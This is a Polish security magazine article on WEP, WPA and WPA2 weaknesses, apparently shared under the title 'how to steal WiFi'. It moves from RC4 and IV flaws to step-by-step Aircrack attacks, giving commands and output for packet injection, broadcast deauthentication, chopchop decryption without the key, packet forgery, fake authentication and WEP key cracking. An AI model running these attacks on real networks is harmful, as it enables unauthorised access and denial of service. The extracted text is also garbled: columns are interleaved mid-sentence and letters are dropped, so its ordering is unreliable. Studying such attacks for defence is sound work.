JAK KRAŚĆ WiFi.pdf

Bezpieczeństwo

Wi-Fi – WEP, WPA i WPA2

Temat numeru

Guillaume Lehembre

stopień trudności

Wi-Fi, czyli Wireless Fidelity, jest obecnie jedną z wiodących

technologii bezprzewodowych, a jej obsługa pojawia się w coraz

to nowych urządzeniach: laptopach, palmtopach, telefonach

komórkowych. Często pomijanym aspektem koniguracji Wi-Fi

pozostaje, niestety, bezpieczeństwo. W tym artykule przyjrzymy

się zabezpieczeniom, jakie oferują dostępne implementacje Wi-Fi.

Wi-Fi są włączane, to najczęściej sto-

sowany jest w nich słabo szyfrowany

protokół – na przykład WEP. Za chwilę przyj-

rzymy się słabościom WEP i przekonamy się,

że jego złamanie jest bardzo proste. Godny

pożałowania poziom zabezpieczeń oferowany

przez WEP w pełni uzasadnia potrzebę wpro-

wadzenia nowej architektury bezpieczeństwa

w postaci standardu 802.11i – poznamy zatem

również komercyjne implementacje tego stan-

dardu, WPA i WPA2. Przeanalizujemy nie tyl-

ko ich zalety, ale i pierwsze znane słabości,

a także możliwości integracji z systemami ope-

racyjnymi.

teczny szyfrogram C był zatem wyliczany we-

dług następującego wzoru:

C = [ M || ICV( M ) ] + [ RC4( K || WI) ]

gdzie || jest operatorem konkatenacji, a + jest

operatorem XOR. Widać tu wyraźnie, że bezpie-

czeństwo transmisji WEP zależy od wektora ini-

cjalizacyjnego, który dla utrzymania przyzwoite-

Z artykułu dowiesz się...

• jakie są słabości algorytmu szyfrującego WEP,

• na czym polega działanie standardu 802.11i

oraz jego komercyjnych implementacji: WPA i

WPA2,

• podstaw protokołu 802.1x,

• jakie są potencjalne słabości WPA i WPA2.

Odpoczywaj w pokoju, WEP

WEP ( Wired Equivalent Privacy ) był domyśl-

nym protokołem wprowadzonym w pierwszym

standardzie IEEE 802.11 jeszcze w 1999 ro-

ku. Bazuje na algorytmie szyfrującym RC4,

w którym tajny klucz o długości 40 lub 104 bi-

tów jest łączony z 24-bitowym wektorem inicja-

lizacyjnym (WI), tworząc ciąg używany do za-

szyfrowania tekstu jawnego M oraz jego sumy

kontrolnej ICV ( Integrity Check Value ). Osta-

Powinieneś wiedzieć...

• powinieneś znać podstawy działania protokołów

TCP/IP i Wi-Fi,

• powinieneś orientować się w podstawowych

pojęciach kryptograicznych.

hakin9 Nr 1/2006

www.hakin9.org

N awet jeśli zabezpieczenia urządzeń

Bezpieczeństwo WEP, WPA i WPA2

go poziomu zabezpieczeń i minimali-

zacji ujawnień powinien być zwiększa-

ny dla każdego pakietu tak, by każdy

kolejny pakiet był szyfrowany innym

kluczem. Niestety, WI jest przesyłany

otwartym tekstem a standard 802.11

nie przewiduje obowiązkowej jego in-

krementacji. W efekcie dostępność te-

go zabezpieczenia zależy wyłącznie

od implementacji standardu, która bę-

dzie działać na konkretnej stacji bez-

przewodowej (punkcie dostępowym

lub karcie bezprzewodowej).

Rysunek 1. Protokół szyfrujący WEP

Tabela 1. Karta chorobowa protokołu WEP

Data Opis

wrzesień 1995 Odkrycie potencjalnej słabości algorytmu RC4 (Wagner)

październik

2000

Krótka historia WEP

Protokół WEP nie został stworzony

przez specjalistów w dziedzinie bez-

pieczeństwa i kryptograii, toteż wkrót-

ce po jego wprowadzeniu okazało się,

że opisane cztery lata wcześniej sła-

bości algorytmu RC4 są aktualne

i tutaj. W 2001 roku Scott Fluhrer, It-

sik Mantin i Adi Shamir (znani pod ko-

lektywnymi inicjałami FMS) opubliko-

wali głośny artykuł o WEP, opisujący

poważne podatności algorytmu szy-

frującego RC4 na dwa rodzaje ata-

ków: atak na niezmienność klucza

i atak ze znanym WI. Oba wykorzystu-

ją fakt, że dla niektórych wartości klu-

cza początkowe bajty strumienia mo-

gą być zależne jedynie od kilku bitów

klucza szyfrującego – choć teoretycz-

nie każdy bit strumienia powinien róż-

nić się od poprzedniego z prawdopo-

dobieństwem 50%. Klucz szyfrujący

jest tu tworzony przez proste skleje-

nie klucza tajnego z WI, toteż w isto-

cie dla niektórych wartości WI istnie-

ją klucze słabe.

Podatności na ataki zostały wy-

korzystane w praktyce przez ta-

kie narzędzia, jak na przykład Air-

Snort , potraiące odtworzyć klu-

cze WEP na podstawie analizy do-

statecznie dużej ilości zaszyfrowa-

nych pakietów. O ile jednak w ruchli-

wej sieci taki atak można było przy-

puścić w rozsądnym czasie, o tyle

co do zasady czas przez niego wy-

magany był dość długi. David Hulton

( h1kari ) opracował zoptymalizowaną

wersję tego ataku, uwzględniającą

w wyliczeniach nie tylko pierwszy

bajt wyniku RC4 (jak to miało miej-

sce w metodzie FMS), ale również

kolejne bajty, co pozwoliło nieco

Pierwsza publikacja opisująca podatności WEP: Unsa-

fe at any key size; An analysis of the WEP encapsulation

(Walker)

maj 2001 Indukcyjny atak z wybranym tekstem jawnym na WEP/

WEP2 (Arbaugh)

lipiec 2001 Atak na CRC z przerzucaniem bitów – Intercepting Mo-

bile Communications: The Insecurity of 802.11 (Borisov,

Goldberg, Wagner)

sierpień 2001 Ataki FMS – Weaknesses in the Key Scheduling Algori-

thm of RC4 (Fluhrer, Mantin, Shamir)

sierpień 2001 Publikacja AirSnorta

luty 2002 Zoptymalizowane ataki FMS autorstwa h1kari

sierpień 2004 Ataki KoreKa z niepowtarzalnymi WI, publikacja narzędzi

chopchop i chopper

lipiec/sierpień

2004

Narzędzia Aircrack (Devine) i WepLab (Sanchez) imple-

mentujące ataki KoreKa

zmniejszyć ilość danych niezbęd-

nych do odtworzenia klucza.

Z etapem sprawdzania integral-

ności wiąże się również poważna sła-

bość wynikająca z użycia CRC32 ja-

ko algorytmu sumy kontrolnej. CRC32

jest wprawdzie często używany do

wykrywania błędów transmisji, ale

ze względu na liniowość przetwarza-

nia nigdy nie był uważany za algorytm

kryptograicznie bezpieczny. Już czte-

ry lata temu dowiedli tego Nikita Bory-

sow, Ian Goldberg i David Wagner.

Po tych odkryciach powszechnie

przyjęto, że oferowany przez WEP po-

ziom bezpieczeństwa nadaje się wy-

łącznie dla użytkowników domowych

i aplikacji bez znaczenia krytyczne-

go. Nawet to zastrzeżenie straciło jed-

nak rację bytu w 2004 roku, gdy poja-

wiły się ataki KoreKa (uogólnione ata-

ki FMS korzystające z optymalizacji

h1kariego ) oraz odwrotny atak induk-

cyjny Arbaugha, pozwalające na de-

szyfrowanie dowolnych pakietów bez

znajomości klucza z wykorzystaniem

techniki wstrzykiwania pakietów. Na-

rzędzia implementujące te techniki,

na przykład Aircrack autorstwa Chri-

stophe’a Devine’a czy WepLab José

Ignacia Sáncheza, potraią odtworzyć

128-bitowy klucz WEP w zaledwie

10 minut (czasem trochę dłużej, w za-

leżności od konkretnego punktu do-

stępowego i karty sieciowej).

Dodanie wstrzykiwania pakietów

znacznie skróciło czas łamania za-

bezpieczeń WEP, gdyż odtworzenie

klucza nie wymagało już milionów,

a zaledwie tysięcy pakietów o róż-

nych WI – około 150 000 dla 64-bito-

wego klucza WEP i 500 000 dla klu-

cza 128-bitowego. Technika wstrzy-

kiwania pozwala zebrać potrzebne

dane dosłownie w kilka minut. Pro-

tokół WEP jest zatem nieodwołalnie

www.hakin9.org

hakin9 Nr 1/2006

Temat numeru

Listing 1. Włączenie trybu monitorowania

Żądania ARP

Opisany w RFC826 protokół ARP ( Ad-

dress Resolution Protocol ) służy do

tłumaczenia 32-bitowego adresu IP

na 48-bitowy adres ethernetowy (bo-

wiem sieci Wi-Fi również korzystają

z protokołu Ethernet). Dla przykładu

załóżmy, że komputer A (192.168.1.1)

chce się porozumieć z komputerem

B (192.168.1.2), co wymaga przetłu-

maczenia znanego adresu IP odbior-

cy na adres MAC z pomocą protoko-

łu ARP. Komputer A wysyła więc pa-

kiet rozgłoszeniowy zawierający adres

IP adresata ( Who has 192.168.1.2? Tell

192.168.1.1 ). Widząc w zapytaniu swój

własny adres, komputer B zwraca od-

powiedź ( 192.168.1.2 is at 01:23:45:67:

89:0A ), która z reguły jest następnie

składowana w pamięci podręcznej.

# airmon.sh start ath0

Interface Chipset Driver

ath0 Atheros madwii (monitor mode enabled)

Listing 2. Wykrywanie pobliskich sieci bezprzewodowych i ich klientów

# airodump ath0 wep-crk 0

BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:1F:9A:72 62 305 16 1 48 WEP hakin9demo

BSSID STATION PWR Packets ESSID

00:13:10:1F:9A:72 00:0C:F1:19:77:5C 56 1 hakin9demo

martwy (patrz Tabela 1) i nie należy

go używać, nawet w przypadku sto-

sowania rotacji kluczy.

Wady bezpieczeństwa protoko-

łu WEP można podsumować nastę-

pująco:

• aireplay: narzędzie do wstrzyki-

wania pakietów,

• aircrack: łamacz kluczy WEP

przetwarzający niepowtarzalne

WI zebrane podczas nasłuchu.

tyczne wiadomości z kolejnymi war-

tościami WI.

W poniższych przykładach 00:

13:10:1F:9A:72 jest adresem MAC

punktu dostępowego (BSSID) na

kanale 1 o SSID hakin9demo , a 00:

09:5B:EB:C5:2B jest adresem MAC

klienta sieci bezprzewodowej (w za-

leżności od przypadku korzystające-

go z WEP lub z WPA-PSK). Wyko-

nanie opisywanych poleceń wymaga

uprawnień roota .

Zaczynamy od przełączenia na-

szej karty bezprzewodowej (w tym

przypadku karty z chipsetem Athe-

ros) w tryb monitorowania, co pozwoli

przechwytywać wszystkie pakiety (Li-

sting 1). Kolejnym etapem jest wykry-

cie pobliskich sieci i ich klientów po-

przez skanowanie wszystkich 14 moż-

liwych kanałów, z jakich mogą korzy-

stać sieci Wi-Fi (Listing 2).

Wynik widoczny na Listingu 2

należy interpretować następująco:

punkt dostępowy o BSSID 00:13:10:

1F:9A:72 używa szyfrowania WEP

na kanale 1 z SSID hakin9demo ,

a z siecią skojarzony jest jeden uwie-

rzytelniony klient o adresie MAC 00:

0C:F1:19:77:5C.

Gdy już namierzyliśmy sieć do-

celową, musimy uruchomić prze-

chwytywanie pakietów na odpowied-

nim kanale, by uniknąć przepuszcza-

nia pakietów podczas niepotrzebne-

go skanowania kolejnych kanałów.

• słabości algorytmu RC4 przenie-

sione na WEP ze względu na me-

todę generowania klucza,

• zbyt krótki WI (24 bity – wystar-

czy niecałe 5000 pakietów, by

osiągnąć pięćdziesięcioprocen-

towe prawdopodobieństwo ko-

lizji) i dopuszczenie powtórne-

go wykorzystania tego samego

WI (brak ochrony przed atakami

z powtórzeniem wiadomości),

• brak przyzwoitego sprawdzania

integralności (algorytm CRC32

nadaje się do wykrywania błę-

dów, ale nie jest kryptograicznie

bezpieczny ze względu na swą li-

niowość),

• brak wbudowanej metody aktuali-

zacji kluczy.

Wstrzykiwanie z wykorzystaniem

aireplay działa jedynie dla wybranych

chipsetów bezprzewodowych, a w try-

bie monitorowania wymaga dodatko-

wo zmodyikowanych wersji najnow-

szych sterowników. Tryb monitorowa-

nia jest odpowiednikiem trybu promi-

scuous dla sieci przewodowych i po-

lega na nieodrzucaniu pakietów prze-

znaczonych dla innych kart siecio-

wych (co ma zwykle miejsce w war-

stwie izycznej modelu OSI), czyli

w efekcie na przechwytywaniu

wszystkich otrzymywanych pakietów.

Zmodyikowane sterowniki pozwalają

jednocześnie odbierać i wstrzykiwać

pakiety na tej samej karcie.

Głównym celem ataku jest gene-

rowanie sztucznego ruchu między

uprawnionym klientem sieci a punk-

tem dostępowym, co pozwala prze-

chwytywać niepowtarzalne WI. Pew-

ne rodzaje zaszyfrowanych infor-

macji można łatwo rozpoznać, gdyż

mają one, na przykład, stałą długość

czy stały adres docelowy. Dotyczy to

między innymi pakietów żądań ARP

(patrz Ramka Żądania ARP ), które

są zawsze wysyłane na adres roz-

głoszeniowy (FF:FF:FF:FF:FF:FF)

i mają stałą długość 68 bajtów. Moż-

liwe jest ciągłe wysyłanie żądań

ARP do tego samego komputera, co

sprawi, że będzie on szyfrował iden-

Łamanie kluczy WEP

z pomocą Aircracka

O łatwości łamania zabezpieczeń

WEP można się przekonać korzysta-

jąc z narzędzia Aircrack, stworzone-

go przez francuskiego badacza Chri-

stophe’a Devine’a. Pakiet Aircrack

zawiera trzy podstawowe narzędzia,

odpowiadające trzem kolejnym fa-

zom ataku:

• airodump: sniffer do wykrywania

sieci obsługujących WEP,

hakin9 Nr 1/2006

www.hakin9.org

Bezpieczeństwo WEP, WPA i WPA2

Następujące polecenie ponownie da

taki sam wynik, jak na Listingu 2:

# airodump ath0 wep-crk 1

Teraz możemy już wykorzystać ze-

brane informacje do wstrzyknięcia

pakietów za pomocą narzędzia aire-

play . Proces wstrzykiwania rozpocz-

nie się w momencie zarejestrowania

w monitorowanej sieci żądania ARP,

dotyczącego namierzanego BSSID:

# aireplay -3 \

-b 00:13:10:1F:9A:72 \

-h 00:0C:F1:19:77:5C \

-x 600 ath0

(...)

Read 980 packets

(got 16 ARP requests),

sent 570 packets...

Rysunek 2. Wyniki pracy Aircracka po kilku minutach

wodowej do ponownego uwierzytel-

nienia, podszywając się pod BSSID

i wysyłając odpowiednio spreparowa-

ne pakiety na adres MAC klienta:

go bajtu wiadomości wymaga zatem

usunięcia ostatniego bajtu szyfrogra-

mu i zastąpienia go innym, a następ-

nie wysłania zmodyikowanego pa-

kietu z powrotem do sieci.

Jeśli bajt nie zostanie odgad-

nięty, punkt dostępowy odrzuci pa-

kiet i trzeba będzie spróbować jesz-

cze raz. Jeśli natomiast pakiet zosta-

nie przyjęty i przekazany dalej, to bajt

został poprawnie odgadnięty. Powtó-

rzenie procedury dla wszystkich baj-

tów wiadomości pozwoli odszyfrować

pakiet WEP i odtworzyć strumień klu-

cza. Wiemy już, że zwiększanie WI

kolejnych pakietów nie jest w protokole

WEP obowiązkowe, toteż wykorzysta-

nie odtworzonego strumienia i prze-

chwyconego WI do szyfrowania sfał-

szowanych pakietów nie jest trudne.

Wykonanie ataku wymaga, by

karta bezprzewodowa nasłuchiwa-

ła na odpowiednim kanale w trybie

monitorowania (tak samo, jak w po-

przednim przykładzie), a oiarą ata-

ku powinien być poprawnie skojarzo-

ny klient sieci (w naszym przypadku

ponownie będzie nim 00:0C:F1:19:

77:5C). Aireplay będzie nas pytać

o pozwolenie wykorzystania kolej-

nych zaszyfrowanych pakietów (Li-

sting 3). W wyniku zostaną utworzo-

ne dwa pliki pcap : jeden dla odszy-

frowanego pakietu, a drugi dla stru-

mienia klucza użytego do szyfrowa-

nia. Pliki te można przeglądać za po-

mocą dowolnego narzędzia prze-

znaczonego do tego celu – my sko-

Pozostaje już tylko odtworzyć klucz

WEP za pomocą narzędzia aircrack.

Skorzystanie z pliku pcap pozwoli

uruchomić ten ostatni etap, gdy airo-

dump nadal rejestruje pakiety (Rysu-

nek 2 przedstawia wyniki):

# aireplay -0 5

-a 00:13:10:1F:9A:72

-c 00:0C:F1:19:77:5C

ath0

# aircrack -x -0 wep-crk.cap

Możliwa (choć nie zawsze skutecz-

na) jest masowa wersja tego ataku,

polegająca na wielokrotnym podszy-

waniu się pod BSSID i wysyłaniu pa-

kietów wymuszających uwierzytel-

nienie na adres rozgłoszeniowy:

Inne odmiany ataków

z narzędziem Aircrack

Aircrack pozwala przeprowadzać

także kilka innych, równie cieka-

wych ataków. Przyjrzyjmy się bliżej

kilku z nich.

# aireplay -0 0

-a 00:13:10:1F:9A:72

ath0

Atak 2: Anulowanie

uwierzytelnienia

Ta metoda ataku może posłużyć do

odtworzenia ukrytego, czyli nieroz-

głaszanego SSID, przechwycenia

czteroetapowej negocjacji połącze-

nia WPA lub zablokowania usługi

(więcej o tym ostatnim zastosowaniu

w części poświęconej protokołowi

802.11i). Celem ataku jest zmusze-

nie klienta do ponownego uwierzy-

telnienia się w sieci, co w połączeniu

z brakiem uwierzytelniania dla ra-

mek sterujących (odpowiedzialnych

właśnie za uwierzytelnianie, kojarze-

nie z siecią itd.) pozwala napastniko-

wi fałszować adresy MAC.

Za pomocą poniższego polecenia

można zmusić klienta sieci bezprze-

Atak 3: Deszyfrowanie

dowolnych pakietów WEP bez

znajomości klucza

Atak ten wykorzystuje stworzone

przez KoreKa narzędzie typu pro-

of-of-concept o nazwie chopchop ,

pozwalające deszyfrować pakiety

WEP bez znajomości klucza. Sto-

sowane w protokole WEP sprawdze-

nie integralności pozwala napastni-

kowi modyikować zarówno szyfro-

gram, jak i jego CRC. Co gorsze, wy-

korzystanie operatora XOR w proto-

kole WEP oznacza, że dany bajt szy-

frogramu jest zależny od odpowiada-

jącego mu pozycją bajtu wiadomości

jawnej. Próba odgadnięcia ostatnie-

www.hakin9.org

hakin9 Nr 1/2006

Temat numeru

Listing 3. Deszyfrowanie pakietów WEP bez znajomości klucza

00:0C:F1:19:77:5C \

192.168.2.123 \

192.168.2.103 \

forge-arp.cap

# aireplay -4 -h 00:0C:F1:19:77:5C ath0

Read 413 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:13:10:1F:9A:72

Dest. MAC = 00:13:10:1F:9A:70

Source MAC = 00:0C:F1:19:77:5C

0x0000: 0841 d500 0013 101f 9a72 000c f119 775c .A.......r....w\

0x0010: 0013 101f 9a70 c040 c3ec e100 b1e1 062c .....p.@.......,

0x0020: 5cf9 2783 0c89 68a0 23f5 0b47 5abd 5b76 \.'...h.#..GZ.[v

0x0030: 0078 91c8 adfe bf30 d98c 1668 56bf 536c .x.....0...hV.Sl

0x0040: 7046 5fd2 d44b c6a0 a3e2 6ae1 3477 74b4 pF_..K....j.4wt.

0x0050: fb13 c1ad b8b8 e735 239a 55c2 ea9f 5be6 .......5#.U...[.

0x0060: 862b 3ec1 5b1a a1a7 223b 0844 37d1 e6e1 .+>.[...";.D7...

0x0070: 3b88 c5b1 0843 0289 1bff 5160 ;....C....Q`

Use this packet ? y

Saving chosen packet in replay_src-0916-113713.cap

Offset 123 ( 0% done) | xor = 07 | pt = 67 | 373 frames written in 1120ms

Offset 122 ( 1% done) | xor = 7D | pt = 2C | 671 frames written in 2013ms

(...)

Offset 35 (97% done) | xor = 83 | pt = 00 | 691 frames written in 2072ms

Offset 34 (98% done) | xor = 2F | pt = 08 | 692 frames written in 2076ms

Saving plaintext in replay_dec-0916-114019.cap

Saving keystream in replay_dec-0916-114019.xor

Completed in 183s (0.47 bytes/s)

Pozostaje już tylko wielokrotnie wy-

słać ten pakiet za pomocą aireplay

(patrz Listing 5).

Przedstawiona metoda ataku jest

mniej zautomatyzowana niż mecha-

nizm fałszowania żądań ARP wbu-

dowany w Aircracka (włączany prze-

łącznikiem -1 ), ale za to bardziej ela-

styczna. Napastnik może wykorzy-

stać odtworzony strumień klucza

do sfałszowania dowolnego pakietu

o długości nieprzekraczającej dłu-

gości klucza; dłuższe pakiety wyma-

gałyby znajomości większej części

strumienia klucza.

Atak 4: Fałszowanie

uwierzytelniania

Opisana wcześniej metoda łama-

nia klucza (ataki 1 i 3) wymaga, by

uprawniony klient (izyczny lub wir-

tualny, choć izyczny jest lepszy) był

skojarzony z punktem dostępowym.

W przeciwnym razie punkt dostępo-

wy mógłby odrzucać pakiety kiero-

wane pod nieskojarzony adres.

Jeśli stosowane jest otwarte uwie-

rzytelnianie, to możliwe jest też uwie-

rzytelnienie dowolnego klienta i sko-

jarzenie go z punktem dostępowym,

ale ten ostatni odrzuci wszelkie pakie-

ty niezaszyfrowane odpowiednim klu-

czem WEP. Przykład z Listingu 6 ilu-

struje wykorzystanie aireplay do sfał-

szowania żądania uwierzytelnienia

i skojarzenia dla SSID hakin9demo

(BSSID: 00:13:10:1F:9A:72) o sfałszo-

wanym adresie MAC 0:1:2:3:4:5.

Niektóre punkty dostępowe wyma-

gają od klientów powtórnego uwierzy-

telniania co 30 sekund. Aireplay umoż-

liwia naśladowanie tego zachowania

– wystarczy jako drugą opcję w wier-

szu poleceń podać wartość 30 .

Listing 4. Czytanie pliku pcap utworzonego w wyniku ataku

# tcpdump -s 0 -n -e -r replay_dec-0916-114019.cap

reading from ile replay_dec-0916-114019.cap, link-type IEEE802_11 (802.11)

11:40:19.642112 BSSID:00:13:10:1f:9a:72 SA:00:0c:f1:19:77:5c DA:00:13:10:1f:9a:70

LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000),

ethertype IPv4 (0x0800): 192.168.2.103 > 192.168.2.254:

ICMP echo request, id 23046, seq 1, length 64

Listing 5. Wielokrotne wysyłanie sfałszowanego pakietu

# aireplay -2 -r forge-arp.cap ath0

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:13:10:1F:9A:72

Dest. MAC = FF:FF:FF:FF:FF:FF

Source MAC = 00:0C:F1:19:77:5C

0x0000: 0841 0201 0013 101f 9a72 000c f119 775c .A.......r....w\

0x0010: ffff ffff ffff 8001 c3ec e100 b1e1 062c ...............,

0x0020: 5cf9 2785 4988 60f4 25f1 4b46 1ab0 199c \.'.I.`.%.KF....

0x0030: b78c 5307 6f2d bdce d18c 8d33 cc11 510a ..S.o-.....3..Q.

0x0040: 49b7 52da I.R.

Use this packet ? y

Saving chosen packet in replay_src-0916-124231.cap

You must also start airodump to capture replies.

Sent 1029 packets...

rzystamy z programu tcpdump . Li-

sting 4 przedstawia odszyfrowa-

ne żądanie echa ( ping ) wymienione

między dwoma komputerami.

Znajomość strumienia klucza

pozwala też fałszować pakiety. Oto

sfałszowane żądanie ARP wysłane

z rzekomego 192.168.2.123 (00:0C:

F1:19:77:5C) do 192.168.2.103:

802.11i

W styczniu 2001 roku stworzono w ra-

mach IEEE grupę projektową i , mają-

cą za zadanie ulepszenie mechani-

zmów uwierzytelniania i szyfrowania

danych protokołu 802.11. W kwietniu

2003 roku Wi-Fi Alliance (organiza-

# arpforge \

replay_dec-0916-114019.xor \

1 \

00:13:10:1F:9A:72 \

hakin9 Nr 1/2006

www.hakin9.org

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: